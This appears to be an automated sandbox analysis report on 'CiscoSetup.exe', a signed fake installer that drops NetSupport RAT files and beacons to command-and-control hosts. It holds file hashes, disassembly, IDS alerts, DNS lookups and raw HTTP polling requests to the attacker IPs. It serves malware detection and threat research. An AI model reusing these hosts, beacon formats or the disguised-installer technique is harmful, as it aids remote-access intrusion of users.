                                                                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):46
                                                                                                                                      Entropy (8bit):4.532048032699691
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                      MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                      SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                      SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                      SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):33144
                                                                                                                                      Entropy (8bit):6.737780491933496
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                      MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                      SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                      SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                      SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, Author: Joe Security
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):72584
                                                                                                                                      Entropy (8bit):6.671736046146569
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
                                                                                                                                      MD5:2A2FC166269EFE48D61CB1AB92215DC2
                                                                                                                                      SHA1:A5679174D941919BAF764F94640994C01D695625
                                                                                                                                      SHA-256:73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
                                                                                                                                      SHA-512:13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
                                                                                                                                      Malicious:true
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2275903
                                                                                                                                      Entropy (8bit):7.997003172118591
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
                                                                                                                                      MD5:C56A7DCC8C1658FA154501AC0819BA7E
                                                                                                                                      SHA1:DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
                                                                                                                                      SHA-256:D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
                                                                                                                                      SHA-512:AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
                                                                                                                                      Malicious:false
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.978020540658888
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                                      • Inno Setup installer (109748/4) 1.08%
                                                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      File name:CiscoSetup.exe
                                                                                                                                      File size:16'883'280 bytes
                                                                                                                                      MD5:446a85d94adb8e2e9157170b82592d6a
                                                                                                                                      SHA1:1ea726940904e568dbdc4a6ef50b61cae6bb55ea
                                                                                                                                      SHA256:65110470f6c6c96877e96a640adcf6178186b675e6d1bc24c19f977a12220294
                                                                                                                                      SHA512:96684b30d90f32a57b8b264da520c31b063991830e472798d46147e3811fcd27e5c400f7fd3832b5ed0975e43b2efd6cbebd152b58442dd5e630416de6a0e0fe
                                                                                                                                      SSDEEP:393216:qxxFZAWTc+MZ3mOvSY6oDXtVVFOzWyY4bkZsFVf:wAL+WmOvS9qDSzJbki
                                                                                                                                      TLSH:8D073327B28BA43DE44A0B3B0572E57844FB7E51A473BD1697E4B9ADCF370611C2E206
                                                                                                                                      Icon Hash:adaeb397f36b6331
                                                                                                                                      Entrypoint:0x4a83bc
                                                                                                                                      Entrypoint Section:.itext
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:6
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:6
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:6
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                                                                                                                      Signature Valid:true
                                                                                                                                      Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                      Error Number:0
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 26/09/2024 08:47:26 27/09/2025 08:47:26
                                                                                                                                      Subject Chain
                                                                                                                                      • E=makedasalzbergneu79@gmail.com, CN=OMICARE JOINT STOCK COMPANY, O=OMICARE JOINT STOCK COMPANY, L=Ha Noi, S=Ha Noi, C=VN, OID.1.3.6.1.4.1.311.60.2.1.2=Ha Noi, OID.1.3.6.1.4.1.311.60.2.1.3=VN, SERIALNUMBER=0108523661, OID.2.5.4.15=Private Organization
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:92142F58BB541C3BD5CD828C76AE0FC4
                                                                                                                                      Thumbprint SHA-1:56FC98490B4845072947536B9E0AC121A37744E6
                                                                                                                                      Thumbprint SHA-256:CF7A5967658B1BDB4A50A13D22EF734C707876B01D8D4B1F94FA493C5D4F3F57
                                                                                                                                      Serial:7F07AA1BB8A3B0183893B1AA
                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      add esp, FFFFFFA4h
                                                                                                                                      push ebx
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      xor eax, eax
                                                                                                                                      mov dword ptr [ebp-3Ch], eax
                                                                                                                                      mov dword ptr [ebp-40h], eax
                                                                                                                                      mov dword ptr [ebp-5Ch], eax
                                                                                                                                      mov dword ptr [ebp-30h], eax
                                                                                                                                      mov dword ptr [ebp-38h], eax
                                                                                                                                      mov dword ptr [ebp-34h], eax
                                                                                                                                      mov dword ptr [ebp-2Ch], eax
                                                                                                                                      mov dword ptr [ebp-28h], eax
                                                                                                                                      mov dword ptr [ebp-14h], eax
                                                                                                                                      mov eax, 004A2EBCh
                                                                                                                                      call 00007F1518761EE5h
                                                                                                                                      xor eax, eax
                                                                                                                                      push ebp
                                                                                                                                      push 004A8AC1h
                                                                                                                                      push dword ptr fs:[eax]
                                                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 004A8A7Bh
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      mov eax, dword ptr [004B0634h]
                                                                                                                                      call 00007F15187F386Bh
                                                                                                                                      call 00007F15187F33BEh
                                                                                                                                      lea edx, dword ptr [ebp-14h]
                                                                                                                                      xor eax, eax
                                                                                                                                      call 00007F15187EE098h
                                                                                                                                      mov edx, dword ptr [ebp-14h]
                                                                                                                                      mov eax, 004B41F4h
                                                                                                                                      call 00007F151875BF93h
                                                                                                                                      push 00000002h
                                                                                                                                      push 00000000h
                                                                                                                                      push 00000001h
                                                                                                                                      mov ecx, dword ptr [004B41F4h]
                                                                                                                                      mov dl, 01h
                                                                                                                                      mov eax, dword ptr [0049CD14h]
                                                                                                                                      call 00007F15187EF3C3h
                                                                                                                                      mov dword ptr [004B41F8h], eax
                                                                                                                                      xor edx, edx
                                                                                                                                      push ebp
                                                                                                                                      push 004A8A27h
                                                                                                                                      push dword ptr fs:[edx]
                                                                                                                                      mov dword ptr fs:[edx], esp
                                                                                                                                      call 00007F15187F38F3h
                                                                                                                                      mov dword ptr [004B4200h], eax
                                                                                                                                      mov eax, dword ptr [004B4200h]
                                                                                                                                      cmp dword ptr [eax+0Ch], 01h
                                                                                                                                      jne 00007F15187FA5DAh
                                                                                                                                      mov eax, dword ptr [004B4200h]
                                                                                                                                      mov edx, 00000028h
                                                                                                                                      call 00007F15187EFCB8h
                                                                                                                                      mov edx, dword ptr [004B4200h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x44d7c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1017510 | 0x2940 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xcb000 | 0x44d7c | 0x44e00 | 60d61e10c85ee163d7ebf4b3a98fdf4f | False | 0.19718409709618875 | data | 5.16526620038522 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcb438 | 0x41828 | Device independent bitmap graphic, 254 x 512 x 32, image size 260096 | English | United States | 0.19084478697713247
RT_STRING | 0x10cc60 | 0x3f8 | data |  |  | 0.3198818897637795
RT_STRING | 0x10d058 | 0x2dc | data |  |  | 0.36475409836065575
RT_STRING | 0x10d334 | 0x430 | data |  |  | 0.40578358208955223
RT_STRING | 0x10d764 | 0x44c | data |  |  | 0.38636363636363635
RT_STRING | 0x10dbb0 | 0x2d4 | data |  |  | 0.39226519337016574
RT_STRING | 0x10de84 | 0xb8 | data |  |  | 0.6467391304347826
RT_STRING | 0x10df3c | 0x9c | data |  |  | 0.6410256410256411
RT_STRING | 0x10dfd8 | 0x374 | data |  |  | 0.4230769230769231
RT_STRING | 0x10e34c | 0x398 | data |  |  | 0.3358695652173913
RT_STRING | 0x10e6e4 | 0x368 | data |  |  | 0.3795871559633027
RT_STRING | 0x10ea4c | 0x2a4 | data |  |  | 0.4275147928994083
RT_RCDATA | 0x10ecf0 | 0x10 | data |  |  | 1.5
RT_RCDATA | 0x10ed00 | 0x310 | data |  |  | 0.6173469387755102
RT_RCDATA | 0x10f010 | 0x2c | data |  |  | 1.1818181818181819
RT_GROUP_ICON | 0x10f03c | 0x14 | data | English | United States | 1.25
RT_VERSION | 0x10f050 | 0x584 | data | English | United States | 0.2747875354107649
RT_MANIFEST | 0x10f5d4 | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Import
kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll | InitCommonControls
user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x40fc10
dbkFCallWrapperAddr | 1 | 0x4b063c
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-01T12:10:58.103251+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.6 | 60703 | 151.236.16.15 | 443 | TCP
2024-11-01T12:10:58.103251+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.6 | 60707 | 199.188.200.195 | 443 | TCP
2024-11-01T12:11:19.931659+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.6 | 49748 | TCP
2024-11-01T12:12:00.477050+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.6 | 60861 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 12:11:31.279987097 CET | 60703 | 443 | 192.168.2.6 | 151.236.16.15
Nov 1, 2024 12:11:31.280038118 CET | 443 | 60703 | 151.236.16.15 | 192.168.2.6
Nov 1, 2024 12:11:31.280733109 CET | 60703 | 443 | 192.168.2.6 | 151.236.16.15
Nov 1, 2024 12:11:31.348548889 CET | 60703 | 443 | 192.168.2.6 | 151.236.16.15
Nov 1, 2024 12:11:31.348586082 CET | 443 | 60703 | 151.236.16.15 | 192.168.2.6
Nov 1, 2024 12:11:31.348650932 CET | 443 | 60703 | 151.236.16.15 | 192.168.2.6
Nov 1, 2024 12:11:31.585293055 CET | 60707 | 443 | 192.168.2.6 | 199.188.200.195
Nov 1, 2024 12:11:31.585328102 CET | 443 | 60707 | 199.188.200.195 | 192.168.2.6
Nov 1, 2024 12:11:31.585469007 CET | 60707 | 443 | 192.168.2.6 | 199.188.200.195
Nov 1, 2024 12:11:31.679563046 CET | 60707 | 443 | 192.168.2.6 | 199.188.200.195
Nov 1, 2024 12:11:31.679601908 CET | 443 | 60707 | 199.188.200.195 | 192.168.2.6
Nov 1, 2024 12:11:31.679656029 CET | 443 | 60707 | 199.188.200.195 | 192.168.2.6
Nov 1, 2024 12:11:31.780821085 CET | 60710 | 80 | 192.168.2.6 | 104.26.1.231
Nov 1, 2024 12:11:31.785718918 CET | 80 | 60710 | 104.26.1.231 | 192.168.2.6
Nov 1, 2024 12:11:31.785784960 CET | 60710 | 80 | 192.168.2.6 | 104.26.1.231
Nov 1, 2024 12:11:31.786320925 CET | 60710 | 80 | 192.168.2.6 | 104.26.1.231
Nov 1, 2024 12:11:31.791259050 CET | 80 | 60710 | 104.26.1.231 | 192.168.2.6
Nov 1, 2024 12:11:32.761198997 CET | 80 | 60710 | 104.26.1.231 | 192.168.2.6
Nov 1, 2024 12:11:32.761261940 CET | 60710 | 80 | 192.168.2.6 | 104.26.1.231
Nov 1, 2024 12:13:21.759007931 CET | 60710 | 80 | 192.168.2.6 | 104.26.1.231
Nov 1, 2024 12:13:21.764305115 CET | 80 | 60710 | 104.26.1.231 | 192.168.2.6
Nov 1, 2024 12:13:21.764372110 CET | 60710 | 80 | 192.168.2.6 | 104.26.1.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2024 12:11:22.318131924 CET | 53 | 54426 | 1.1.1.1 | 192.168.2.6
Nov 1, 2024 12:11:31.021378994 CET | 61106 | 53 | 192.168.2.6 | 1.1.1.1
Nov 1, 2024 12:11:31.274995089 CET | 53 | 61106 | 1.1.1.1 | 192.168.2.6
Nov 1, 2024 12:11:31.349478960 CET | 62899 | 53 | 192.168.2.6 | 1.1.1.1
Nov 1, 2024 12:11:31.515782118 CET | 53 | 62899 | 1.1.1.1 | 192.168.2.6
Nov 1, 2024 12:11:31.765129089 CET | 64406 | 53 | 192.168.2.6 | 1.1.1.1
Nov 1, 2024 12:11:31.777743101 CET | 53 | 64406 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 1, 2024 12:11:31.021378994 CET | 192.168.2.6 | 1.1.1.1 | 0x4762 | Standard query (0) | payiki.com | A (IP address) | IN (0x0001) | false
Nov 1, 2024 12:11:31.349478960 CET | 192.168.2.6 | 1.1.1.1 | 0x80da | Standard query (0) | anyhowdo.com | A (IP address) | IN (0x0001) | false
Nov 1, 2024 12:11:31.765129089 CET | 192.168.2.6 | 1.1.1.1 | 0xe084 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 1, 2024 12:11:31.274995089 CET | 1.1.1.1 | 192.168.2.6 | 0x4762 | No error (0) | payiki.com |  | 151.236.16.15 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 12:11:31.515782118 CET | 1.1.1.1 | 192.168.2.6 | 0x80da | No error (0) | anyhowdo.com |  | 199.188.200.195 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 12:11:31.777743101 CET | 1.1.1.1 | 192.168.2.6 | 0xe084 | No error (0) | geo.netsupportsoftware.com |  | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 12:11:31.777743101 CET | 1.1.1.1 | 192.168.2.6 | 0xe084 | No error (0) | geo.netsupportsoftware.com |  | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 12:11:31.777743101 CET | 1.1.1.1 | 192.168.2.6 | 0xe084 | No error (0) | geo.netsupportsoftware.com |  | 104.26.0.231 | A (IP address) | IN (0x0001) | false
• 151.236.16.15 (connection: keep-alive; cmd=poll; info=1; ack=1)
• 199.188.200.195 (connection: keep-alive; cmd=poll; info=1; ack=1)
• geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 60703 | 151.236.16.15 | 443 | 4176 | C:\Users\user\AppData\Roaming\Cisco\client32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 12:11:31.348548889 CET | 218 | OUT | POST http://151.236.16.15/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 151.236.16.15
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 60707 | 199.188.200.195 | 443 | 4176 | C:\Users\user\AppData\Roaming\Cisco\client32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 12:11:31.679563046 CET | 222 | OUT | POST http://199.188.200.195/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 199.188.200.195
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
                                                                                                                                      Data Raw:
                                                                                                                                      Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 60710 | 104.26.1.231 | 80 | 4176 | C:\Users\user\AppData\Roaming\Cisco\client32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 12:11:31.786320925 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache
Nov 1, 2024 12:11:32.761198997 CET | 959 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 01 Nov 2024 11:11:32 GMT
                                                                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      CF-Ray: 8dbb71d30a3a4768-DFW
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cache-Control: private
                                                                                                                                      Set-Cookie: ASPSESSIONIDACBSDDAB=ODPLDFECBLLOAAMMDDNGAAEI; path=/
                                                                                                                                      cf-apo-via: origin,host
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIjJQUOBBtGwTAxhlwWrlxt4LQ3eUYtHkDpBp9OWdk5XakPmpGvZmhIYGQURK4NWNF8rhB6AEyrINMbt3NoFkmSEI%2F0OAm5QZG4Z%2BzZVQJFuqzlEM9Kyrib6SG5vZhXtVsvSzoYqLHCmxcub"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: f32.7767,-96.7970



                                                                                                                                      Target ID:0
                                                                                                                                      Start time:07:11:02
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\Desktop\CiscoSetup.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\CiscoSetup.exe"
                                                                                                                                      Imagebase:0xe80000
                                                                                                                                      File size:16'883'280 bytes
                                                                                                                                      MD5 hash:446A85D94ADB8E2E9157170B82592D6A
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
